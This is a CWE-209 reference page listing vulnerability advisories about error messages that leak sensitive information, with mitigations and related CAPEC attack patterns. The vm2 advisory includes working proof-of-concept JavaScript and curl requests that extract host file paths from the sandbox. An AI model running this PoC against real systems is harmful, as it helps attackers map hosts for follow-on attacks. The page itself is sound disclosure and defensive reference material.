CWE-209
AllowedGeneration of Error Message Containing Sensitive Information
Abstraction: Base · Status: Draft
The product generates an error message that includes sensitive information about its environment, users, or associated data.
833 vulnerabilities reference this CWE, most recent first.
GHSA-RHHV-6W3F-J654
Vulnerability from github – Published: 2024-12-16 15:31 – Updated: 2026-04-01 18:32Generation of Error Message Containing Sensitive Information vulnerability in Dave Kiss Vimeography allows Retrieve Embedded Sensitive Data.This issue affects Vimeography: from n/a through 2.4.4.
{
"affected": [],
"aliases": [
"CVE-2024-54366"
],
"database_specific": {
"cwe_ids": [
"CWE-209"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-12-16T15:15:09Z",
"severity": "MODERATE"
},
"details": "Generation of Error Message Containing Sensitive Information vulnerability in Dave Kiss Vimeography allows Retrieve Embedded Sensitive Data.This issue affects Vimeography: from n/a through 2.4.4.",
"id": "GHSA-rhhv-6w3f-j654",
"modified": "2026-04-01T18:32:49Z",
"published": "2024-12-16T15:31:35Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-54366"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/wordpress/plugin/vimeography/vulnerability/wordpress-vimeography-plugin-2-4-4-full-path-disclosure-fpd-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-RJ3P-P9RQ-VVC3
Vulnerability from github – Published: 2024-03-22 18:30 – Updated: 2024-03-22 18:30IBM Security Verify Directory 10.0.0 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 228507.
{
"affected": [],
"aliases": [
"CVE-2022-32756"
],
"database_specific": {
"cwe_ids": [
"CWE-209"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-03-22T16:15:08Z",
"severity": "LOW"
},
"details": "IBM Security Verify Directory 10.0.0 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 228507.",
"id": "GHSA-rj3p-p9rq-vvc3",
"modified": "2024-03-22T18:30:31Z",
"published": "2024-03-22T18:30:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-32756"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/228507"
},
{
"type": "WEB",
"url": "https://www.ibm.com/support/pages/node/7145001"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-RMGR-P64X-32GM
Vulnerability from github – Published: 2026-02-03 03:30 – Updated: 2026-03-03 03:32A vulnerability in update-reports-purge-settings.sh script logging for Brocade SANnav before 2.4.0a could allow the collection of SANnav database password in the system audit logs. The vulnerability could allow a remote authenticated attacker with access to the audit logs to access the Brocade SANnav database password.
{
"affected": [],
"aliases": [
"CVE-2025-12773"
],
"database_specific": {
"cwe_ids": [
"CWE-209"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-03T01:15:57Z",
"severity": "HIGH"
},
"details": "A vulnerability in update-reports-purge-settings.sh script logging for Brocade SANnav before 2.4.0a could allow the collection of SANnav database password in the system audit logs.\u00a0The vulnerability could allow a remote authenticated attacker with access to the audit logs to access the Brocade SANnav database password.",
"id": "GHSA-rmgr-p64x-32gm",
"modified": "2026-03-03T03:32:41Z",
"published": "2026-02-03T03:30:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12773"
},
{
"type": "WEB",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36847"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:P/VC:H/VI:N/VA:N/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-RR4Q-QMWM-H86V
Vulnerability from github – Published: 2022-05-14 03:53 – Updated: 2022-05-14 03:53389-ds-base version before 1.3.5.19 and 1.3.6.7 are vulnerable to password brute-force attacks during account lockout due to different return codes returned on password attempts.
{
"affected": [],
"aliases": [
"CVE-2017-7551"
],
"database_specific": {
"cwe_ids": [
"CWE-209",
"CWE-640"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-08-16T18:29:00Z",
"severity": "CRITICAL"
},
"details": "389-ds-base version before 1.3.5.19 and 1.3.6.7 are vulnerable to password brute-force attacks during account lockout due to different return codes returned on password attempts.",
"id": "GHSA-rr4q-qmwm-h86v",
"modified": "2022-05-14T03:53:46Z",
"published": "2022-05-14T03:53:46Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-7551"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2017:2569"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2017-7551"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1477669"
},
{
"type": "WEB",
"url": "https://pagure.io/389-ds-base/issue/49336"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-RVFC-G8J5-9CCF
Vulnerability from github – Published: 2022-02-09 00:59 – Updated: 2024-04-22 19:47A flaw was found in Keycloak 7.0.1. A logged in user can do an account email enumeration attack.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.keycloak:keycloak-parent"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "7.0.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-1717"
],
"database_specific": {
"cwe_ids": [
"CWE-209"
],
"github_reviewed": true,
"github_reviewed_at": "2021-04-01T16:29:50Z",
"nvd_published_at": "2021-02-11T18:15:00Z",
"severity": "LOW"
},
"details": "A flaw was found in Keycloak 7.0.1. A logged in user can do an account email enumeration attack.",
"id": "GHSA-rvfc-g8j5-9ccf",
"modified": "2024-04-22T19:47:34Z",
"published": "2022-02-09T00:59:06Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-1717"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1796281"
},
{
"type": "WEB",
"url": "https://issues.jboss.org/browse/KEYCLOAK-12014"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Generation of Error Message Containing Sensitive Information in Keycloak"
}
GHSA-RVMX-XW47-RH9G
Vulnerability from github – Published: 2024-09-13 15:31 – Updated: 2024-09-13 15:31The Custom Post Limits plugin for WordPress is vulnerable to full path disclosure in all versions up to, and including, 4.4.1. This is due to the plugin utilizing bootstrap and leaving test files with display_errors on. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.
{
"affected": [],
"aliases": [
"CVE-2024-6544"
],
"database_specific": {
"cwe_ids": [
"CWE-200",
"CWE-209"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-09-13T15:15:16Z",
"severity": "MODERATE"
},
"details": "The Custom Post Limits plugin for WordPress is vulnerable to full path disclosure in all versions up to, and including, 4.4.1. This is due to the plugin utilizing bootstrap and leaving test files with display_errors on. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.",
"id": "GHSA-rvmx-xw47-rh9g",
"modified": "2024-09-13T15:31:35Z",
"published": "2024-09-13T15:31:35Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6544"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/custom-post-limits/trunk/tests/bootstrap.php"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9cf4a11e-ad28-4a93-9278-1d2d113a4859?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-V27G-JCQJ-V8RW
Vulnerability from github – Published: 2026-05-07 04:30 – Updated: 2026-05-14 20:36Summary
vm2's CallSite wrapper class (intended as a safe wrapper for V8's native CallSite) blocks getThis() and getFunction() to prevent host object leakage, but allows getFileName() to return unsanitized host absolute paths. Any sandboxed code can extract the full directory structure, library paths, and framework versions of the host server.
Details
In lib/setup-sandbox.js:436-466, the CallSite class overrides getThis() and getFunction() with undefined to prevent host object references from leaking into the sandbox. However, the following methods pass through unsanitized values from the original V8 CallSite object:
getFileName()— returns host absolute paths like/app/node_modules/vm2/lib/vm.jsgetLineNumber(),getColumnNumber()— exact source locationsgetFunctionName(),getMethodName(),getTypeName()— internal function names
Two exploitation paths exist:
1. Default error.stack: new Error().stack includes host frame paths in the formatted string
2. Custom prepareStackTrace: Attacker can set Error.prepareStackTrace to directly call getFileName() on each CallSite, extracting a clean list of all host paths
PoC
Library-level PoC (Node.js script — primary):
const { VM } = require("vm2");
const vm = new VM();
// Path A — Default error.stack
const result1 = vm.run(`try { null.x; } catch(e) { e.stack }`);
console.log(result1);
// Output includes: /app/node_modules/vm2/lib/vm.js:289:18
// /app/src/server.js:49:20
// Path B — prepareStackTrace extraction
const result2 = vm.run(`
Error.prepareStackTrace = function(e, sst) {
return sst.map(function(s) { return s.getFileName(); }).join(", ");
};
new Error().stack
`);
console.log(result2);
// Output: vm.js, node:vm, /app/node_modules/vm2/lib/vm.js, /app/src/sandbox.js, ...
HTTP demonstration:
# Default error.stack
curl -s -X POST http://localhost:3000/api/execute \
-H "Content-Type: application/json" \
-d '{"code":"try { null.x; } catch(e) { e.stack }"}'
# Result includes host paths: /app/src/server.js, /app/node_modules/express/...
# prepareStackTrace extraction
curl -s -X POST http://localhost:3000/api/execute \
-H "Content-Type: application/json" \
-d '{"code":"Error.prepareStackTrace = function(e, sst) { return sst.map(function(s) { return s.getFileName(); }).join(\", \"); }; new Error().stack"}'
# Result: /app/node_modules/vm2/lib/vm.js, /app/src/sandbox.js, /app/src/server.js, ...
Impact
- Information Disclosure: Host directory structure, library paths, framework versions, and internal architecture are exposed to sandboxed code.
- Attack Chain: Leaked paths enable precise targeting for other vulnerabilities.
- Scope: All applications using vm2. No special configuration required.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.10.5"
},
"package": {
"ecosystem": "npm",
"name": "vm2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.11.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44002"
],
"database_specific": {
"cwe_ids": [
"CWE-209"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-07T04:30:10Z",
"nvd_published_at": "2026-05-13T18:16:16Z",
"severity": "MODERATE"
},
"details": "### Summary\nvm2\u0027s `CallSite` wrapper class (intended as a safe wrapper for V8\u0027s native CallSite) blocks `getThis()` and `getFunction()` to prevent host object leakage, but allows `getFileName()` to return unsanitized host absolute paths. Any sandboxed code can extract the full directory structure, library paths, and framework versions of the host server.\n\n### Details\nIn `lib/setup-sandbox.js:436-466`, the `CallSite` class overrides `getThis()` and `getFunction()` with `undefined` to prevent host object references from leaking into the sandbox. However, the following methods pass through unsanitized values from the original V8 CallSite object:\n\n- `getFileName()` \u2014 returns host absolute paths like `/app/node_modules/vm2/lib/vm.js`\n- `getLineNumber()`, `getColumnNumber()` \u2014 exact source locations\n- `getFunctionName()`, `getMethodName()`, `getTypeName()` \u2014 internal function names\n\nTwo exploitation paths exist:\n1. **Default `error.stack`**: `new Error().stack` includes host frame paths in the formatted string\n2. **Custom `prepareStackTrace`**: Attacker can set `Error.prepareStackTrace` to directly call `getFileName()` on each CallSite, extracting a clean list of all host paths\n\n### PoC\n\n**Library-level PoC (Node.js script \u2014 primary):**\n```javascript\nconst { VM } = require(\"vm2\");\nconst vm = new VM();\n\n// Path A \u2014 Default error.stack\nconst result1 = vm.run(`try { null.x; } catch(e) { e.stack }`);\nconsole.log(result1);\n// Output includes: /app/node_modules/vm2/lib/vm.js:289:18\n// /app/src/server.js:49:20\n\n// Path B \u2014 prepareStackTrace extraction\nconst result2 = vm.run(`\n Error.prepareStackTrace = function(e, sst) {\n return sst.map(function(s) { return s.getFileName(); }).join(\", \");\n };\n new Error().stack\n`);\nconsole.log(result2);\n// Output: vm.js, node:vm, /app/node_modules/vm2/lib/vm.js, /app/src/sandbox.js, ...\n```\n\n**HTTP demonstration:**\n```bash\n# Default error.stack\ncurl -s -X POST http://localhost:3000/api/execute \\\n -H \"Content-Type: application/json\" \\\n -d \u0027{\"code\":\"try { null.x; } catch(e) { e.stack }\"}\u0027\n# Result includes host paths: /app/src/server.js, /app/node_modules/express/...\n\n# prepareStackTrace extraction\ncurl -s -X POST http://localhost:3000/api/execute \\\n -H \"Content-Type: application/json\" \\\n -d \u0027{\"code\":\"Error.prepareStackTrace = function(e, sst) { return sst.map(function(s) { return s.getFileName(); }).join(\\\", \\\"); }; new Error().stack\"}\u0027\n# Result: /app/node_modules/vm2/lib/vm.js, /app/src/sandbox.js, /app/src/server.js, ...\n```\n\n### Impact\n- **Information Disclosure**: Host directory structure, library paths, framework versions, and internal architecture are exposed to sandboxed code.\n- **Attack Chain**: Leaked paths enable precise targeting for other vulnerabilities.\n- **Scope**: All applications using vm2. No special configuration required.",
"id": "GHSA-v27g-jcqj-v8rw",
"modified": "2026-05-14T20:36:52Z",
"published": "2026-05-07T04:30:10Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-v27g-jcqj-v8rw"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44002"
},
{
"type": "PACKAGE",
"url": "https://github.com/patriksimek/vm2"
},
{
"type": "WEB",
"url": "https://github.com/patriksimek/vm2/releases/tag/v3.11.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "vm2 is Vulnerable to Host File Path Disclosure via Stack Trace Information Leak"
}
GHSA-V2PM-G2FX-6M9C
Vulnerability from github – Published: 2023-12-28 09:30 – Updated: 2023-12-28 09:30HCL Launch could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system.
{
"affected": [],
"aliases": [
"CVE-2023-45701"
],
"database_specific": {
"cwe_ids": [
"CWE-209"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-12-28T07:15:07Z",
"severity": "MODERATE"
},
"details": "HCL Launch could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system.\n",
"id": "GHSA-v2pm-g2fx-6m9c",
"modified": "2023-12-28T09:30:19Z",
"published": "2023-12-28T09:30:19Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45701"
},
{
"type": "WEB",
"url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0108645"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-V2RP-VJV7-VGQ4
Vulnerability from github – Published: 2022-05-13 01:19 – Updated: 2022-05-13 01:19The Web server in 3CX version 15.5.8801.3 is vulnerable to Information Leakage, because of improper error handling in Stack traces, as demonstrated by discovering a full pathname.
{
"affected": [],
"aliases": [
"CVE-2018-14907"
],
"database_specific": {
"cwe_ids": [
"CWE-209"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-08-03T18:29:00Z",
"severity": "MODERATE"
},
"details": "The Web server in 3CX version 15.5.8801.3 is vulnerable to Information Leakage, because of improper error handling in Stack traces, as demonstrated by discovering a full pathname.",
"id": "GHSA-v2rp-vjv7-vgq4",
"modified": "2022-05-13T01:19:10Z",
"published": "2022-05-13T01:19:10Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-14907"
},
{
"type": "WEB",
"url": "https://medium.com/stolabs/security-issues-on-3cx-web-service-d9dc7f1bea79"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-V5H2-Q2W4-GPCX
Vulnerability from github – Published: 2024-11-22 20:27 – Updated: 2026-06-08 19:09Impact
During routine testing, we identified a scenario where a specific error message generated by our platform could include a plaintext Client ID and Client Secret for an application integration. The Client ID and Client Secret would not be displayed in the UI, but would be returned in the underlying HTTP response to the end user. This could occur under the following conditions:
- An app installation made use of a Search UI component with the async flag set to true (default: true),
- A user types types into the Search Component which creates a request to the third-party for search or query results, and
- That third-party response may then fail validation and Sentry would return the select-requester.invalid-response error code along with a serialized version of a Sentry application containing the integration Client Secret.
Should this error be found, it's reasonable to assume the potential exposure of an integration Client Secret. However, an ID and Secret pair alone does not provide direct access to any data. For that secret to be abused an attacker would also need to obtain a valid API token for a Sentry application.
Impact for SaaS Users
For Sentry SaaS users, we have confirmed that only a single application integration was impacted and the owner has rotated their Client Secret. We have also confirmed that no abuse of the leaked Client Secret has occurred.
Potential Impact for Self-Hosted Users
Sentry self-hosted does not ship with any application integrations. This could only impact self-hosted users that maintain their own integrations. In that case, search for a select-requester.invalid-response event. Please note that this error was also shared with another event unrelated to this advisory so you will also need to review the parameters logged for each named event. You may review select_requester.py for the instances where these errors can be generated. With the security fix this is no longer a shared event type.
Patches
- Sentry SaaS users do not need to take any action.
- Sentry self-hosted users should upgrade to 24.11.1 or higher.
References
- Bug introduced in https://github.com/getsentry/sentry/pull/79377
- Security fix in https://github.com/getsentry/sentry/pull/81038
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "sentry"
},
"ranges": [
{
"events": [
{
"introduced": "24.11.0"
},
{
"fixed": "24.11.1"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"24.11.0"
]
}
],
"aliases": [
"CVE-2024-53253"
],
"database_specific": {
"cwe_ids": [
"CWE-209"
],
"github_reviewed": true,
"github_reviewed_at": "2024-11-22T20:27:19Z",
"nvd_published_at": "2024-11-22T20:15:09Z",
"severity": "MODERATE"
},
"details": "### Impact\nDuring routine testing, we identified a scenario where a specific error message generated by our platform could include a plaintext Client ID and Client Secret for an application integration. The Client ID and Client Secret would not be displayed in the UI, but would be returned in the underlying HTTP response to the end user. This could occur under the following conditions:\n- An app installation made use of a [Search UI component](https://docs.sentry.io/organization/integrations/integration-platform/ui-components/formfield/#select) with the `async` flag set to true (default: true),\n- A user types types into the Search Component which creates a request to the third-party for search or query results, and\n- That third-party response may then fail validation and Sentry would return the `select-requester.invalid-response` error code along with a serialized version of a Sentry application containing the integration Client Secret.\n\nShould this error be found, it\u0027s reasonable to assume the potential exposure of an integration Client Secret. However, an ID and Secret pair alone does not provide direct access to any data. For that secret to be abused an attacker would also need to obtain a valid API token for a Sentry application. \n\n#### Impact for SaaS Users\nFor Sentry SaaS users, we have confirmed that only a single application integration was impacted and the owner has rotated their Client Secret. We have also confirmed that no abuse of the leaked Client Secret has occurred. \n\n#### Potential Impact for Self-Hosted Users\nSentry self-hosted does not ship with any application integrations. This could only impact self-hosted users that maintain their own integrations. In that case, search for a `select-requester.invalid-response` event. Please note that this error was also shared with another event unrelated to this advisory so you will also need to review the parameters logged for each named event. You may review [select_requester.py](https://github.com/getsentry/sentry/blob/4a448fbb0d0b416fef9ee0ab26579e0dc16f21b7/src/sentry/sentry_apps/external_requests/select_requester.py#L78-L123) for the instances where these errors can be generated. With the security fix this is no longer a shared event type.\n\n### Patches\n- Sentry SaaS users do not need to take any action.\n- Sentry self-hosted users should upgrade to 24.11.1 or higher.\n\n### References\n- Bug introduced in https://github.com/getsentry/sentry/pull/79377\n- Security fix in https://github.com/getsentry/sentry/pull/81038",
"id": "GHSA-v5h2-q2w4-gpcx",
"modified": "2026-06-08T19:09:32Z",
"published": "2024-11-22T20:27:19Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/getsentry/sentry/security/advisories/GHSA-v5h2-q2w4-gpcx"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-53253"
},
{
"type": "WEB",
"url": "https://github.com/getsentry/sentry/pull/79377"
},
{
"type": "WEB",
"url": "https://github.com/getsentry/sentry/pull/81038"
},
{
"type": "PACKAGE",
"url": "https://github.com/getsentry/sentry"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/sentry/PYSEC-2024-310.yaml"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Sentry improper error handling leaks Application Integration Client Secret"
}
Mitigation MIT-39
- Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success.
- If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files.
- Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not.
Mitigation
Handle exceptions internally and do not display errors containing potentially sensitive information to a user.
Mitigation MIT-33
Strategy: Attack Surface Reduction
Use naming conventions and strong types to make it easier to spot when sensitive data is being used. When creating structures, objects, or other complex entities, separate the sensitive and non-sensitive data as much as possible.
Mitigation MIT-40
Strategy: Compilation or Build Hardening
Debugging information should not make its way into a production release.
Mitigation MIT-40
Strategy: Environment Hardening
Debugging information should not make its way into a production release.
Mitigation
Where available, configure the environment to use less verbose error messages. For example, in PHP, disable the display_errors setting during configuration, or at runtime using the error_reporting() function.
Mitigation
Create default error pages or messages that do not leak any information.
CAPEC-215: Fuzzing for application mapping
An attacker sends random, malformed, or otherwise unexpected messages to a target application and observes the application's log or error messages returned. The attacker does not initially know how a target will respond to individual messages but by attempting a large number of message variants they may find a variant that trigger's desired behavior. In this attack, the purpose of the fuzzing is to observe the application's log and error messages, although fuzzing a target can also sometimes cause the target to enter an unstable state, causing a crash.
CAPEC-463: Padding Oracle Crypto Attack
An adversary is able to efficiently decrypt data without knowing the decryption key if a target system leaks data on whether or not a padding error happened while decrypting the ciphertext. A target system that leaks this type of information becomes the padding oracle and an adversary is able to make use of that oracle to efficiently decrypt data without knowing the decryption key by issuing on average 128*b calls to the padding oracle (where b is the number of bytes in the ciphertext block). In addition to performing decryption, an adversary is also able to produce valid ciphertexts (i.e., perform encryption) by using the padding oracle, all without knowing the encryption key.
CAPEC-54: Query System for Information
An adversary, aware of an application's location (and possibly authorized to use the application), probes an application's structure and evaluates its robustness by submitting requests and examining responses. Often, this is accomplished by sending variants of expected queries in the hope that these modified queries might return information beyond what the expected set of queries would provide.
CAPEC-7: Blind SQL Injection
Blind SQL Injection results from an insufficient mitigation for SQL Injection. Although suppressing database error messages are considered best practice, the suppression alone is not sufficient to prevent SQL Injection. Blind SQL Injection is a form of SQL Injection that overcomes the lack of error messages. Without the error messages that facilitate SQL Injection, the adversary constructs input strings that probe the target through simple Boolean SQL expressions. The adversary can determine if the syntax and structure of the injection was successful based on whether the query was executed or not. Applied iteratively, the adversary determines how and where the target is vulnerable to SQL Injection.